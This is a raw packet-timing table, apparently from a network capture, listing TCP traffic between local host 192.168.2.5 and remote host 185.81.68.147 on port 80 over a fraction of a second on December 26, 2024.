                                                                                      Dec 26, 2024 12:05:10.371411085 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.371445894 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.371485949 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.372581005 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.372617960 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.372622967 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.372659922 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.373368979 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.373406887 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.373505116 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.373543978 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.374428034 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.374473095 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.374490976 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.374527931 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.375387907 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.375439882 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.375503063 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.375545025 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.376395941 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.376446962 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.376456976 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.376518965 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.377454996 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.377507925 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.377556086 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.377599001 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.378473043 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.378523111 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.378561020 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.378602982 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.379451036 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.379503965 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.379545927 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.379586935 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.380553961 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.380620003 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.380841017 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.380883932 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.381510019 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.381531000 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.381551981 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.381576061 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.382534027 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.382555008 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.382579088 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.382600069 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.383555889 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.383605957 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.383670092 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.383702993 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.384660959 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.384696960 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.384715080 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.384777069 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.385611057 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.385653973 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.385804892 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.385844946 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.386648893 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.386692047 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.386785984 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.386827946 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.387701035 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.387713909 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.387754917 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.387772083 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.388760090 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.388799906 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.388820887 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.388861895 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.389703989 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.389811039 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.389856100 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.390772104 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.390818119 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.390876055 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.390918970 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.391861916 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.391940117 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.391942978 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.391982079 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.392764091 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.392811060 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.392879963 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.392920017 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.393789053 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.393886089 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.393944025 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.394836903 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.394886971 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.394908905 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.395019054 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.395847082 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.395896912 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.396060944 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.396105051 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.396867037 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.396915913 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.397069931 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.397114992 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.397888899 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.398015022 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.398063898 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.398988008 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.399035931 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.399099112 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.399139881 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.399976015 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.400017023 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.400047064 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.400085926 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.400966883 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.401006937 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.401036024 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.401076078 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.402043104 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.402132034 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.402175903 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.403038979 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.403079987 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.403146982 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.403187037 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.404048920 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.404090881 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.404122114 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.404164076 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.405081034 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.405126095 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.405164003 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.405277014 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.406109095 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.406212091 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.406261921 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.407171011 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.407217979 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.407248974 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.407309055 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.408143044 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.408251047 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.408277035 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.408298969 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.409156084 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.409564018 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.566099882 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.566157103 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.566217899 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.566217899 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.566523075 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.566658020 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.566766977 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.567554951 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.567614079 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.567641020 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.567701101 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.568631887 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.568706989 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.568743944 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.568815947 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.569725990 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.569775105 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.569801092 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.570621014 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.570660114 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.570760012 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.570815086 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.571686029 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.571728945 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.571842909 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.571881056 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.572841883 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.572905064 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.572956085 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.573016882 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.573743105 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.573786020 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.573865891 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.573951006 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.574745893 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.574841976 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.574888945 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.574888945 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.575844049 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.575911045 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.576001883 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.576076984 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.576858997 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.576920033 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.576953888 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.576997042 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.578099966 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.578192949 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.578285933 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.578903913 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.578960896 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.578969955 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.579050064 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.579874039 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.579979897 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.579998016 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.580008984 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.580982924 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.581034899 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.581094980 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.581154108 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.582191944 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.582236052 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.582263947 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.582319021 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.583086014 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.583126068 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.583179951 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.583991051 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.584048033 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.584155083 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.584213018 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.585000992 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.585042000 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.585150003 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.585202932 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.585974932 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.586123943 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.586163044 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.587033033 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.587078094 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.587105989 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.587169886 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.588073969 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.588118076 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.588138103 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.588176012 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.589076996 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.589131117 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.589174032 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.589221001 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.590116024 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.590154886 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.590166092 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.590221882 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.591145992 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.591202974 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.591285944 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.592139959 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.592180014 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.592262030 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.592298031 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.593177080 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.593234062 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.593271971 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.593312025 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.594203949 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.594265938 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.594299078 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.595259905 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.595330000 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.595347881 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.595437050 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.596745014 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.596941948 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.597002029 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.597567081 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.597631931 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.597661018 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.597708941 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.598365068 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.598403931 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.598447084 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.598536015 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.599350929 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.599456072 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.599581003 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.600373983 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.600419998 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.600460052 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.600505114 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.601358891 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.601423979 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.601483107 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.601545095 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.602405071 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.603121996 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.603178978 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.603461981 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.603565931 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.603605032 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.603646994 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.604474068 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.604507923 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.604715109 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.604772091 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.605489016 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.605534077 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.605564117 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.605607033 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.606497049 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.606637001 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.606690884 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.607517958 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.607573032 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.607657909 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.607693911 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.608546972 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.608597994 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.608642101 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.608680964 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.609571934 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.609626055 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.609709024 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.609782934 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.610614061 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.610717058 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.610769987 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.611638069 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.611706018 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.611742973 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.611840010 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.612723112 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.613056898 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.613126993 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.613667965 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.613748074 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.613763094 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.613837957 CET4970880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:05:10.614717007 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.614783049 CET8049708185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:05:10.614834070 CET4970880192.168.2.5185.81.68.147
